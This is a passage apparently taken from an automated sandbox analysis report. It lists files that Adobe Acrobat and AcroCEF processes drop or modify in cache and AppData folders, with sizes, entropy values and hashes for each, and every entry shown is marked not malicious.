SHA-256: | A773F1E04697985A4A0DD5ED884003E0DF3432965726BEC76CA3DDCA0B255EA8 |
SHA-512: | BCF6B73FAEF68CC262D74DBC04CF0F2747E0749839386F8C5FAB597196047FEEBBD36873FB02146BA1FC5530688D6E723031E10B8FE55DBC96A22A93C603D899 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.200667187705393 |
Encrypted: | false |
SSDEEP: | 6:iO4qVE9+q2Pwkn2nKuAl9OmbnIFUtSqVERJZmwsqVER9VkwOwkn2nKuAl9OmbjLJ:7nzvYfHAahFUtZE7/LER5JfHAaSJ |
MD5: | ADED3BC7F6A8DBDF0BC20683961ED886 |
SHA1: | E497912D638A3B5E7BAE046BB9C5D94018EC20D6 |
SHA-256: | 8B8FB0E8EF21ABDF82CC8B385F7A4D65C5631CD7E589A24189BBD5DA7F80E94B |
SHA-512: | 56C1954D1ABD5C8F8F6975CF8F6F2FA565FA4E315498BAFCBCC7F3B234914AC3B819CF193753CA31576E4AD984077AA9EE7CD7CAA58ADF687A2B28B03456AA0B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.200667187705393 |
Encrypted: | false |
SSDEEP: | 6:iO4qVE9+q2Pwkn2nKuAl9OmbnIFUtSqVERJZmwsqVER9VkwOwkn2nKuAl9OmbjLJ:7nzvYfHAahFUtZE7/LER5JfHAaSJ |
MD5: | ADED3BC7F6A8DBDF0BC20683961ED886 |
SHA1: | E497912D638A3B5E7BAE046BB9C5D94018EC20D6 |
SHA-256: | 8B8FB0E8EF21ABDF82CC8B385F7A4D65C5631CD7E589A24189BBD5DA7F80E94B |
SHA-512: | 56C1954D1ABD5C8F8F6975CF8F6F2FA565FA4E315498BAFCBCC7F3B234914AC3B819CF193753CA31576E4AD984077AA9EE7CD7CAA58ADF687A2B28B03456AA0B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.180919889438989 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlM+q2Pwkn2nKuAl9Ombzo2jMGIFUtSqVlSUFnZmwsqVlS5tNVkwOwkn2nK3:7n3vYfHAa8uFUtZp9/L2z5JfHAa8RJ |
MD5: | DD50980C181A86ECE658283DCEE9FA82 |
SHA1: | A315E1E2ADC6233C1507A0F6C34110113CF078F4 |
SHA-256: | 590C91993B2C51A0F06C4F8F2919558C3D1FDA81922DF593D5C62771A9798893 |
SHA-512: | E28DE30D73E4587A60F7B4FE12A1B9294B2CEFBB4D37FFCB2399F6898A5306EDBB046D3EA6AE09F2733A8BD755DE35491269D7DFF5FFA96CE78C60B6BF9E440C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.180919889438989 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlM+q2Pwkn2nKuAl9Ombzo2jMGIFUtSqVlSUFnZmwsqVlS5tNVkwOwkn2nK3:7n3vYfHAa8uFUtZp9/L2z5JfHAa8RJ |
MD5: | DD50980C181A86ECE658283DCEE9FA82 |
SHA1: | A315E1E2ADC6233C1507A0F6C34110113CF078F4 |
SHA-256: | 590C91993B2C51A0F06C4F8F2919558C3D1FDA81922DF593D5C62771A9798893 |
SHA-512: | E28DE30D73E4587A60F7B4FE12A1B9294B2CEFBB4D37FFCB2399F6898A5306EDBB046D3EA6AE09F2733A8BD755DE35491269D7DFF5FFA96CE78C60B6BF9E440C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\091d1f93-42bc-4dfa-82e2-932382839822.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.968572608542831 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqcesBdOg2Hwcaq3QYiubInP7E4T3y:Y2sRdszdMH73QYhbG7nby |
MD5: | C536FBF74AB241738CA195AB8930472A |
SHA1: | D9277A503C8D4ECAD91EA73D5345E92BD51C2DEE |
SHA-256: | 0912C424E234B9C90129B35D49A56EA48634937473BA3D5423F10773FE033C57 |
SHA-512: | 9A4132D1B1E44F05ABF7DFCEBF76BC04296EB6C3279214EA3B65C8CCD0B863E5BA327C57A243B0061035289C4DAB73F76B7A2627E08D41D886E9C9C19FDA2D16 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.968572608542831 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqcesBdOg2Hwcaq3QYiubInP7E4T3y:Y2sRdszdMH73QYhbG7nby |
MD5: | C536FBF74AB241738CA195AB8930472A |
SHA1: | D9277A503C8D4ECAD91EA73D5345E92BD51C2DEE |
SHA-256: | 0912C424E234B9C90129B35D49A56EA48634937473BA3D5423F10773FE033C57 |
SHA-512: | 9A4132D1B1E44F05ABF7DFCEBF76BC04296EB6C3279214EA3B65C8CCD0B863E5BA327C57A243B0061035289C4DAB73F76B7A2627E08D41D886E9C9C19FDA2D16 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4320 |
Entropy (8bit): | 5.258011330149945 |
Encrypted: | false |
SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo79p5:etJCV4FiN/jTN/2r8Mta02fEhgO73go5 |
MD5: | A641C8CBC808178A9E3B130B01E7466F |
SHA1: | 70F38905501F31EC4CCFB6AB94A4E8487617E840 |
SHA-256: | C01B6F3B039AFF98A35FE95D121B2BB89585D3FDD93F417DE02958EF0E8FBCD2 |
SHA-512: | 34A68A83A742E4652A562FD70AB2A9EE9C4C1F918F9709587EE44CAF3041ADF943126D57055A204200E554E0B25B4EFF9DE841CD4C4F4832E6845B5143EE5CBA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.1541869342242785 |
Encrypted: | false |
SSDEEP: | 6:iO4qVfGtN+q2Pwkn2nKuAl9OmbzNMxIFUtSqVI/FffFZZmwsqVI9FVNVkwOwkn2v:7nbvYfHAa8jFUtZIFZ/LKFVz5JfHAa8E |
MD5: | 0C934789B2691E309AE16E52F522F030 |
SHA1: | 0EFBD114C1F17DEE318AC21B453AB95DD9FDAD10 |
SHA-256: | 3408D3BCF2614CF711D5E131450098DBC68CB6152C5A100F673FABC92A179BD9 |
SHA-512: | 8A71B24277116A510DBC1C626F336775CD82ACC2EC86D644AFBD6EF62302942EA03480A96D68FEE7FAFBC725DF3F1E6020B019F65CD21B6ADD0C0FB70930E12C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.1541869342242785 |
Encrypted: | false |
SSDEEP: | 6:iO4qVfGtN+q2Pwkn2nKuAl9OmbzNMxIFUtSqVI/FffFZZmwsqVI9FVNVkwOwkn2v:7nbvYfHAa8jFUtZIFZ/LKFVz5JfHAa8E |
MD5: | 0C934789B2691E309AE16E52F522F030 |
SHA1: | 0EFBD114C1F17DEE318AC21B453AB95DD9FDAD10 |
SHA-256: | 3408D3BCF2614CF711D5E131450098DBC68CB6152C5A100F673FABC92A179BD9 |
SHA-512: | 8A71B24277116A510DBC1C626F336775CD82ACC2EC86D644AFBD6EF62302942EA03480A96D68FEE7FAFBC725DF3F1E6020B019F65CD21B6ADD0C0FB70930E12C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.44474712648412 |
Encrypted: | false |
SSDEEP: | 384:Seqci5t4iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:ufs3OazzU89UTTgUL |
MD5: | 0832BFCB961A6BABEE77C1C530D9178A |
SHA1: | 273C362E9769E8A508DAADC4FDD075E13448CD0D |
SHA-256: | DEAB9D18F3275A9DA5327E0A111606BC78D2BC601ADA76722B46C59D6FF1ED7D |
SHA-512: | 1EE8926BD03DDE37641F58E3F31DBE6C537D7C40203DEE058A0A65C030050FA25325107C39268190594CCA918F87D10D45575B4A60B1DB4BCB5C195875460115 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.214967624776796 |
Encrypted: | false |
SSDEEP: | 24:7+tvFKnuwKWqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9b:7MvInCWqvmFTIF3XmHjBoGGR+jMz+LhV |
MD5: | 02108CC80B64D54DDBDC72BD2EE284BB |
SHA1: | C75A5EC1B6A0C7C01A8F8691ED96EB0FFE434074 |
SHA-256: | 22D8D61F16D1AF2355FD1254C7A7172B54C226827BB4BF4895B07509FCD1ACF0 |
SHA-512: | DF46E6080BB4096C69DBD5EECF4E6EA1C448D7DD2087C626CE4928C42C5987EE895F4C29F042809EE9C0652131F965330090513BEA1BA51BD0FEBFFE3EA71721 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFkl7Sdat/ltfllXlE/HT8kpHzttNNX8RolJuRdxLlGB9lQRYwpDdt:kKxdatteT8gHzVNMa8RdWBwRd |
MD5: | EDC03880CCCC28F856DA3D25F151F0DA |
SHA1: | 484CADBB79B100E10ADABBF3F0317F29917B7477 |
SHA-256: | E9ABB596F7EB09F3AC9D5318A182DFBF3CDE68DCCB05FDD0EB05EC0A8947F8A1 |
SHA-512: | 5D920638BCD0B0C68E025330FB7F3BAD9ABE0FE372310A9A368DC44B47FF4B819835D6237EAE2264D5C651A6428DCC538187066F07DFAE884FB91FA5A2724A76 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.371103008323593 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJM3g98kUwPeUkwRe9:YvXKXE2tVu2Zc0vEGMbLUkee9 |
MD5: | C3050E96EA9F4294089DFE0AE111FE67 |
SHA1: | AD87E277F57F05A2DDAEBBE1AE9BE54C24A39D0F |
SHA-256: | 3B34FB8299566D206F42D6235732FF397E15997D8058844302CE7545E907B60F |
SHA-512: | F3458B1156F1410575C4B48FD91D4EA9E956AEAE3C055398FE31F2F51F4442E6311C4824E065B8825CBFF75B9888EBEBAF2965CB4D713BE985C14F9F8E9C3899 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.3212890005167885 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJfBoTfXpnrPeUkwRe9:YvXKXE2tVu2Zc0vEGWTfXcUkee9 |
MD5: | 56648B36727F2D08A04A31CB3B31C790 |
SHA1: | 91DC091DAED821538AE388AE73F195DF70CAA52C |
SHA-256: | A4CFB328E206A14D672F416938C78A0A6090A34AD544C4F33F4A9E5B64D879C0 |
SHA-512: | 6DBC8AE9C5984B84AB0CF15266AF5985B31F49ECBB0AEA425DB3D3CE95D3164242E0D652175A283C8F448ECA45882BF43844046AF648599EB52EBCEC310E80C4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.300284035911865 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJfBD2G6UpnrPeUkwRe9:YvXKXE2tVu2Zc0vEGR22cUkee9 |
MD5: | 9C4CEEFBBB257675901242EEE88A50CA |
SHA1: | 9C039C6A248EA953E49D909D36C1283E6606E1AE |
SHA-256: | CCD9CA458A0CD82FE091FBEB09A7B18BE51126B441F1C6826BB167E3D63BFAA3 |
SHA-512: | E89E3ED849A2AC873F4592F0C507A47CDF224060A8C911127358734DAA3490001E843A40C8A85C8362F638AC0FF7039A6ECC1C1346B571A588261924D9B36884 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.358385080203188 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJfPmwrPeUkwRe9:YvXKXE2tVu2Zc0vEGH56Ukee9 |
MD5: | 1817C727FBCEDBB672E2CE405FFAD3A4 |
SHA1: | 94C0DB51F6A425D26418AEF8CF8E035BEBF13716 |
SHA-256: | 2FB48819789FB0E1C80F978AF2CF587DC2D47F2276A3D9C226497DA5549A8D02 |
SHA-512: | 6393E32FFB3CDD9903DE1C8E532BD84F33DA0E95E902B3050CFAE5F6F02CE5BA13418BDE23EC0975B1F1702240ED5F2CE16248F3A5450663D9CDE90BFC8EA186 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.693017932483432 |
Encrypted: | false |
SSDEEP: | 24:Yv6XXpzvBpLgE9cQx8LennAvzBvkn0RCmK8czOCCSGc:Yve5hgy6SAFv5Ah8cv/Gc |
MD5: | 3D6CC342E3B62E666AC9C0717B30D345 |
SHA1: | 054B9230FB513AEB4AD4BBF57588F4E30DC2F150 |
SHA-256: | 6A4AEAB28DF82DE720651112B55C1CB8100E668FA54444D304C32C4601CCFE89 |
SHA-512: | E5589C3F8DDBDD811D511038E2573A02531D9B4D5E0A96596ACD1947CC099CEAA5863882BB3E2C750ABAE0C68C8836DA3C3451781719EE602C0B95009ED99E33 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.305782952891711 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJf8dPeUkwRe9:YvXKXE2tVu2Zc0vEGU8Ukee9 |
MD5: | 90D461FBC0F2BB85C740944A990B152F |
SHA1: | 3A1202C3777FC3CB18E39A059FA2372360480461 |
SHA-256: | 71212E8DDD38798E90F581ACD9CE1FB7922186391214C643F99B422607427FA1 |
SHA-512: | 2334C4528DA1103C803055606EF95EE44909EF1A92179450309E5E0771D9173EEAF9B6A158D21BA1C56C0488D389EA9B7257A41BFA5AF99AFE3ED2852B4E8D12 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.309624174616474 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJfQ1rPeUkwRe9:YvXKXE2tVu2Zc0vEGY16Ukee9 |
MD5: | F5FBD3415A3E87C039B276781FAB437D |
SHA1: | F06788E9B9E580E7B65C24C23D419FB560391E97 |
SHA-256: | 8BE6FEEFB48528478EFE542A33F6DEACFCF353DF56A1BC5C11481DFBC833F6FB |
SHA-512: | A9C3186D12C05C3DE98C7995083B809855AA080A0C39645519472F11E49815DCA14421B917695767D4E957963A06BC719B2CA949227C1DBD3DAB29C1BF2B4D5A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.315591168904863 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJfFldPeUkwRe9:YvXKXE2tVu2Zc0vEGz8Ukee9 |
MD5: | 4BAFAC1D547F8F98879DF6640E772AF4 |
SHA1: | 70FE188D1E947FC32D14870EB5A525E1B31E7805 |
SHA-256: | 3E26E512A7BA45E343740504F4FF2596ED72B34DD74DD73A51799A462C689030 |
SHA-512: | FDAD7582A967536153254722FBF65A6CCD423365E89C990D70D17C3E84DDE24BAE2A1545E3699F51D8187B7383B80EFED6E1A851C486A89F8EC9AC7E51627A95 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.330694607803134 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJfzdPeUkwRe9:YvXKXE2tVu2Zc0vEGb8Ukee9 |
MD5: | 112B82C20A8FF44610A27244440B88EB |
SHA1: | A0201D2BD7BA2A6CF2C8AB8EA7E9BAD27B45F8F4 |
SHA-256: | 60B9C5EE6E2564A887BD3EDBEACB2BC69C08D6A6259AD5368E7A73D6F8CCE3CC |
SHA-512: | 46B962549E80844DA8E89B2FCE007D4233F644216949930BE99F518F92691D3E0066DFA994CFFED4ED30227B18F97F36C1DF90446B4197A42204C3F09BB0E92A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.31157359597927 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJfYdPeUkwRe9:YvXKXE2tVu2Zc0vEGg8Ukee9 |
MD5: | 25BBB1FF15CD34CD30D717D0ACEFBAC9 |
SHA1: | 95BF8258D457A59E1DD381B1439E420240AA901A |
SHA-256: | EE8C163CC1ED07556F97D90994168B5E5A2E0C6C38C8CB27FA9F72135AE99D81 |
SHA-512: | 20CD8BCBFADD36AB40578421031819A540EB56A98905E527E2B768BBD7DC788026DE75FF2EBB6FF349C3BFA1473D96FDD38FE9B1166E8F52BB6F83C806796F3C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.298126720222377 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJf+dPeUkwRe9:YvXKXE2tVu2Zc0vEG28Ukee9 |
MD5: | FBE402C3E9DA49706146FB95BDCF2F7C |
SHA1: | B0B7D4755875CD2C325F60A982DC18DEF027911A |
SHA-256: | 1E267F7F07963A35D69E32FD15C7BA16FAF2BBE768F94729339F504C08A293E7 |
SHA-512: | 30B477896CB40FEB9CAF67DB6091A3746F3020D26775210940A7FA04DA7123F0C38D08EE7E2063F8F0AC1691C7B148D12A8599717FC216CAA6CFE36D07883E58 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.295041150038155 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJfbPtdPeUkwRe9:YvXKXE2tVu2Zc0vEGDV8Ukee9 |
MD5: | 2CD24D6A5D052FF64EFA87623A85D995 |
SHA1: | C97EEDD36BDD98AD6186D9A1EBB0D8F91E3A7696 |
SHA-256: | 1D32CC1CE9EA4EF9261D68A6E2CE6E6124F53A7A1725A54B95140278BB7259C9 |
SHA-512: | 20ADEFFA9D1F68B41DA2D0753CD94092E7662A0872CCE0E83DBDBE55E2D10B4C963974BC260407A870254F3F7255BCD1840FC11A9B8EFDD39CDEFCDD1E887E20 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.299852798526146 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJf21rPeUkwRe9:YvXKXE2tVu2Zc0vEG+16Ukee9 |
MD5: | C3C47B7A486B5CF6B7890A066339EB51 |
SHA1: | 317536C15B95871EB18DB4956F474A1D6F3FFDF5 |
SHA-256: | 16DC221915189A35FF6BDE48C14D4F1EE302DCA7C1575A74A51F5DA1D77397EE |
SHA-512: | 2108D8291069D7DC1ED6EED8F15A0E2BB6B5AB7338C4D1728EC4B52FB63F83144F4B2915D583AC36F1D5CAB1CC381D62298919B0B6096F32C86C7C9AB7A01E03 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
